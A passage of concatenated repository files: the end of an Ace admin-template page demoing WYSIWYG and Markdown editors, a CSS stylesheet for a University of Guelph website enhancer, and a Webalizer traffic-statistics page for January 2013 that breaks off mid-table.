nav-search-icon"></i> </span> </form> </div><!-- #nav-search --> </div> <div class="page-content"> <div class="page-header position-relative"> <h1>Wysiwyg &amp; Markdown Editor </h1> </div><!-- /.page-header --> <div class="row-fluid"> <div class="span12"> <!-- PAGE CONTENT BEGINS --> <h4 class="header green clearfix"> Bootstrap Lightweight Editor <span class="block pull-right"> <small class="grey middle">Choose style: &nbsp;</small> <span class="btn-toolbar inline middle no-margin"> <span data-toggle="buttons-radio" class="btn-group no-margin"> <button class="btn btn-mini btn-yellow">1</button> <button class="btn btn-mini btn-yellow active">2</button> <button class="btn btn-mini btn-yellow">3</button> </span> </span> </span> </h4> <div class="wysiwyg-editor" id="editor1"></div> <div class="hr hr-double dotted"></div> <div class="row-fluid"> <div class="span6"> <h4 class="header blue">Inside Widget</h4> <div class="widget-box"> <div class="widget-header widget-header-small header-color-green"> <div class="widget-toolbar"> <a href="#" data-action="collapse"> <i class="icon-chevron-up"></i> </a> </div> </div> <div class="widget-body"> <div class="widget-main no-padding"> <div class="wysiwyg-editor" id="editor2"></div> </div> <div class="widget-toolbox padding-4 clearfix"> <div class="btn-group pull-left"> <button class="btn btn-small btn-grey"> <i class="icon-remove bigger-125"></i> Cancel </button> </div> <div class="btn-group pull-right"> <button class="btn btn-small btn-danger"> <i class="icon-save bigger-125"></i> Save </button> <button class="btn btn-small btn-success"> <i class="icon-globe bigger-125"></i> Publish <i class="icon-arrow-right icon-on-right bigger-125"></i> </button> </div> </div> </div> </div> </div> <div class="span6"> <h4 class="header green">Markdown Editor</h4> <div class="widget-box"> <div class="widget-header widget-header-small header-color-blue"> </div> <div class="widget-body"> <div class="widget-main no-padding"> <textarea class="span12" name="content" data-provide="markdown" rows="10">**Markdown Editor** inside a *widget box* - list item 1 - list item 2 - list item 3</textarea> </div> <div class="widget-toolbox padding-4 clearfix"> <div class="btn-group pull-left"> <button class="btn btn-small btn-info"> <i class="icon-remove bigger-125"></i> Cancel </button> </div> <div class="btn-group pull-right"> <button class="btn btn-small btn-purple"> <i class="icon-save bigger-125"></i> Save </button> </div> </div> </div> </div> </div> </div> <script type="text/javascript"> var $path_assets = "assets";//this will be used in loading jQuery UI if needed! </script> <!-- PAGE CONTENT ENDS --> </div><!-- /.span --> </div><!-- /.row-fluid --> </div><!-- /.page-content --> <div class="ace-settings-container" id="ace-settings-container"> <div class="btn btn-app btn-mini btn-warning ace-settings-btn" id="ace-settings-btn"> <i class="icon-cog bigger-150"></i> </div> <div class="ace-settings-box" id="ace-settings-box"> <div> <div class="pull-left"> <select id="skin-colorpicker" class="hide"> <option data-skin="default" value="#438EB9">#438EB9</option> <option data-skin="skin-1" value="#222A2D">#222A2D</option> <option data-skin="skin-2" value="#C6487E">#C6487E</option> <option data-skin="skin-3" value="#D0D0D0">#D0D0D0</option> </select> </div> <span>&nbsp; Choose Skin</span> </div> <div> <input type="checkbox" class="ace ace-checkbox-2" id="ace-settings-navbar" /> <label class="lbl" for="ace-settings-navbar"> Fixed Navbar</label> </div> <div> <input type="checkbox" class="ace ace-checkbox-2" id="ace-settings-sidebar" /> <label class="lbl" for="ace-settings-sidebar"> Fixed Sidebar</label> </div> <div> <input type="checkbox" class="ace ace-checkbox-2" id="ace-settings-breadcrumbs" /> <label class="lbl" for="ace-settings-breadcrumbs"> Fixed Breadcrumbs</label> </div> <div> <input type="checkbox" class="ace ace-checkbox-2" id="ace-settings-rtl" /> <label class="lbl" for="ace-settings-rtl"> Right To Left (rtl)</label> </div> </div> </div><!-- /#ace-settings-container --> </div><!-- /.main-content --> </div><!-- /.main-container --> <a href="#" id="btn-scroll-up" class="btn-scroll-up btn btn-small btn-inverse"> <i class="icon-double-angle-up icon-only bigger-110"></i> </a> <!-- basic scripts --> <!--[if !IE]> --> <script type="text/javascript"> window.jQuery || document.write("<script src='assets/js/jquery-2.0.3.min.js'>"+"<"+"/script>"); </script> <!-- <![endif]--> <!--[if IE]> <script type="text/javascript"> window.jQuery || document.write("<script src='assets/js/jquery-1.10.2.min.js'>"+"<"+"/script>"); </script> <![endif]--> <script type="text/javascript"> if("ontouchend" in document) document.write("<script src='assets/js/jquery.mobile.custom.min.js'>"+"<"+"/script>"); </script> <script src="assets/js/bootstrap.min.js"></script> <!-- page specific plugin scripts --> <script src="assets/js/jquery-ui-1.10.3.custom.min.js"></script> <script src="assets/js/jquery.ui.touch-punch.min.js"></script> <script src="assets/js/markdown/markdown.min.js"></script> <script src="assets/js/markdown/bootstrap-markdown.min.js"></script> <script src="assets/js/jquery.hotkeys.min.js"></script> <script src="assets/js/bootstrap-wysiwyg.min.js"></script> <script src="assets/js/bootbox.min.js"></script> <!-- ace scripts --> <script src="assets/js/ace-elements.min.js"></script> <script src="assets/js/ace.min.js"></script> <!-- inline scripts related to this page --> <script type="text/javascript"> jQuery(function($){ function showErrorAlert (reason, detail) { var msg=''; if (reason==='unsupported-file-type') { msg = "Unsupported format " +detail; } else { console.log("error uploading file", reason, detail); } $('<div class="alert"> <button type="button" class="close" data-dismiss="alert">&times;</button>'+ '<strong>File upload error</strong> '+msg+' </div>').prependTo('#alerts'); } //$('#editor1').ace_wysiwyg();//this will create the default editor will all buttons //but we want to change a few buttons colors for the third style $('#editor1').ace_wysiwyg({ toolbar: [ 'font', null, 'fontSize', null, {name:'bold', className:'btn-info'}, {name:'italic', className:'btn-info'}, {name:'strikethrough', className:'btn-info'}, {name:'underline', className:'btn-info'}, null, {name:'insertunorderedlist', className:'btn-success'}, {name:'insertorderedlist', className:'btn-success'}, {name:'outdent', className:'btn-purple'}, {name:'indent', className:'btn-purple'}, null, {name:'justifyleft', className:'btn-primary'}, {name:'justifycenter', className:'btn-primary'}, {name:'justifyright', className:'btn-primary'}, {name:'justifyfull', className:'btn-inverse'}, null, {name:'createLink', className:'btn-pink'}, {name:'unlink', className:'btn-pink'}, null, {name:'insertImage', className:'btn-success'}, null, 'foreColor', null, {name:'undo', className:'btn-grey'}, {name:'redo', className:'btn-grey'} ], 'wysiwyg': { fileUploadError: showErrorAlert } }).prev().addClass('wysiwyg-style2'); $('#editor2').css({'height':'200px'}).ace_wysiwyg({ toolbar_place: function(toolbar) { return $(this).closest('.widget-box').find('.widget-header').prepend(toolbar); }, toolbar: [ 'bold', {name:'italic' , title:'Change Title!', icon: 'icon-leaf'}, 'strikethrough', 'underline', null, 'insertunorderedlist', 'insertorderedlist', null, 'justifyleft', 'justifycenter', 'justifyright' ], speech_button:false }); $('[data-toggle="buttons-radio"]').on('click', function(e){ var target = $(e.target); var which = parseInt($.trim(target.text())); var toolbar = $('#editor1').prev().get(0); if(which == 1 || which == 2 || which == 3) { toolbar.className = toolbar.className.replace(/wysiwyg\-style(1|2)/g , ''); if(which == 1) $(toolbar).addClass('wysiwyg-style1'); else if(which == 2) $(toolbar).addClass('wysiwyg-style2'); } }); //Add Image Resize Functionality to Chrome and Safari //webkit browsers don't have image resize functionality when content is editable //so let's add something using jQuery UI resizable //another option would be opening a dialog for user to enter dimensions. if ( typeof jQuery.ui !== 'undefined' && /applewebkit/.test(navigator.userAgent.toLowerCase()) ) { var lastResizableImg = null; function destroyResizable() { if(lastResizableImg == null) return; lastResizableImg.resizable( "destroy" ); lastResizableImg.removeData('resizable'); lastResizableImg = null; } var enableImageResize = function() { $('.wysiwyg-editor') .on('mousedown', function(e) { var target = $(e.target); if( e.target instanceof HTMLImageElement ) { if( !target.data('resizable') ) { target.resizable({ aspectRatio: e.target.width / e.target.height, }); target.data('resizable', true); if( lastResizableImg != null ) {//disable previous resizable image lastResizableImg.resizable( "destroy" ); lastResizableImg.removeData('resizable'); } lastResizableImg = target; } } }) .on('click', function(e) { if( lastResizableImg != null && !(e.target instanceof HTMLImageElement) ) { destroyResizable(); } }) .on('keydown', function() { destroyResizable(); }); } enableImageResize(); /** //or we can load the jQuery UI dynamically only if needed if (typeof jQuery.ui !== 'undefined') enableImageResize(); else {//load jQuery UI if not loaded $.getScript($path_assets+"/js/jquery-ui-1.10.3.custom.min.js", function(data, textStatus, jqxhr) { if('ontouchend' in document) {//also load touch-punch for touch devices $.getScript($path_assets+"/js/jquery.ui.touch-punch.min.js", function(data, textStatus, jqxhr) { enableImageResize(); }); } else enableImageResize(); }); } */ } }); </script> </body> </html>
style.css
Fogest/University-of-Guelph-Website-Enhancer
@import url(http://fonts.googleapis.com/css?family=Archivo+Black); #exportPopup { position: fixed; z-index: 100; top: 35%; left: 35%; display: none; width: 30%; border: 2px solid black; border-radius: 10px; background: rgb(150, 150, 150); box-shadow: 2px 2px 2px #6b3c3c; } .title { font-size: 30px; font-weight: bold; color: rgb(27, 44, 238); } .subtitle { font-style: italic; color: #091163; } .button { padding: 6px; border-radius: 6px; box-shadow: rgb(0, 0, 0) 1px 1px 1px; } .button:hover { cursor: pointer; box-shadow: rgb(73, 50, 50) 3px 3px 3px; } #closeExportWindow { margin-top: 10px; margin-bottom: 3px; } /*Class Schedule CSS*/ h1 { font-family: 'Archivo Black', sans-serif; font-weight: 800; } div#header h1, div#content h1 { font-family: 'Arial, Helvetica', sans-serif; font-weight: 600; } #schedulegrid th { font-family: 'Archivo Black', sans-serif; background-color: rgb(219, 80, 80); } #schedulegrid td { font-family: 'Archivo Black', sans-serif; background-color: rgb(232, 232, 232); } #schedulegrid .time { background-color: rgba(255, 251, 0, .39); } #schedulegrid .slot { font-family: 'Archivo Black', sans-serif; background-color: rgba(152, 152, 152, 0.35); } .container { width: 80% !important; } #askgryph { width: 80% !important; padding-right: 0 !important; padding-left: 0 !important; } #misc, #misc .container { background: #45403a !important; } div.vertical table.layout, div.vertical table.layout tbody table { width: 100%; } /*Student Menu CSS*/ #content { width: 75% !important; } #sidebar { width: 25% !important; }
stats/usage_201301.html
markhazlewood/hazydesigns-com
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- Generated by The Webalizer Ver. 2.01-10 --> <!-- --> <!-- Copyright 1997-2000 Bradford L. Barrett --> <!-- (brad@mrunix.net http://www.mrunix.net) --> <!-- --> <!-- Distributed under the GNU GPL Version 2 --> <!-- Full text may be found at: --> <!-- http://www.mrunix.net/webalizer/ --> <!-- --> <!-- Give the power back to the programmers --> <!-- Support the Free Software Foundation --> <!-- (http://www.fsf.org) --> <!-- --> <!-- *** Generated: 01-Feb-2013 04:47 EST *** --> <HTML> <HEAD> <TITLE>Usage Statistics for hazydesignscom.fatcow.com - January 2013</TITLE> </HEAD> <BODY BGCOLOR="#E8E8E8" TEXT="#000000" LINK="#0000FF" VLINK="#FF0000"> <H2>Usage Statistics for hazydesignscom.fatcow.com</H2> <SMALL><STRONG> Summary Period: January 2013<BR> Generated 01-Feb-2013 04:47 EST<BR> </STRONG></SMALL> <CENTER> <HR> <P> <SMALL> <A HREF="#DAYSTATS">[Daily Statistics]</A> <A HREF="#HOURSTATS">[Hourly Statistics]</A> <A HREF="#TOPURLS">[URLs]</A> <A HREF="#TOPENTRY">[Entry]</A> <A HREF="#TOPEXIT">[Exit]</A> <A HREF="#TOPSITES">[Sites]</A> <A HREF="#TOPREFS">[Referrers]</A> <A HREF="#TOPSEARCH">[Search]</A> <A HREF="#TOPAGENTS">[Agents]</A> <A HREF="#TOPCTRYS">[Countries]</A> </SMALL> <P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH COLSPAN=3 ALIGN=center BGCOLOR="#C0C0C0">Monthly Statistics for January 2013</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Hits</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>1741</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Files</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>1483</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Pages</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>427</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Visits</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>297</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total KBytes</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>85456</B></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Unique Sites</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>348</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Unique URLs</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>48</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Unique Referrers</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>44</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Unique User Agents</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>28</B></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH WIDTH=380 BGCOLOR="#C0C0C0"><FONT SIZE=-1 COLOR="#C0C0C0">.</FONT></TH> <TH WIDTH=65 BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE=-1>Avg </FONT></TH> <TH WIDTH=65 BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE=-1>Max </FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD><FONT SIZE="-1">Hits per Hour</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>2</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>48</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Hits per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>56</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>119</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Files per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>47</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>97</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Pages per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>13</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>31</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Visits per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>9</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>18</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">KBytes per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>2757</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>5938</B></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH COLSPAN=3 ALIGN=center BGCOLOR="#C0C0C0"> <FONT SIZE="-1">Hits by Response Code</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD><FONT SIZE="-1">Code 200 - OK</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>1483</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Code 206 - Partial Content</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>3</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Code 304 - Not Modified</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>46</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Code 404 - Not Found</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>209</B></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="DAYSTATS"></A> <IMG SRC="daily_usage_201301.png" ALT="Daily usage for January 2013" HEIGHT=400 WIDTH=512><P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" COLSPAN=13 ALIGN=center>Daily Statistics for January 2013</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH ALIGN=center BGCOLOR="#C0C0C0"><FONT SIZE="-1">Day</FONT></TH> <TH ALIGN=center BGCOLOR="#008040" COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH ALIGN=center BGCOLOR="#0080FF" COLSPAN=2><FONT SIZE="-1">Files</FONT></TH> <TH ALIGN=center BGCOLOR="#00E0FF" COLSPAN=2><FONT SIZE="-1">Pages</FONT></TH> <TH ALIGN=center BGCOLOR="#FFFF00" COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH ALIGN=center BGCOLOR="#FF8000" COLSPAN=2><FONT SIZE="-1">Sites</FONT></TH> <TH ALIGN=center BGCOLOR="#FF0000" COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.41%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1536</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.80%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.28%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>231</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.27%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>95</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.46%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>90</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.07%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4982</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.83%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.16%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>134</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.16%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.39%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>55</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3223</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.77%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.36%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.34%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.74%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1652</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.93%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1717</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.01%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>77</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>69</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.85%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2936</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.44%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>99</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>92</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.20%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5863</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.86%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.28%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>165</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.19%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.36%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.89%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1280</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.50%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.68%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.16%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2421</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.83%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.24%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2396</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.80%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>119</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.84%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>82</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.53%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.71%</FONT></TD> <TD ALIGN=right><FONT 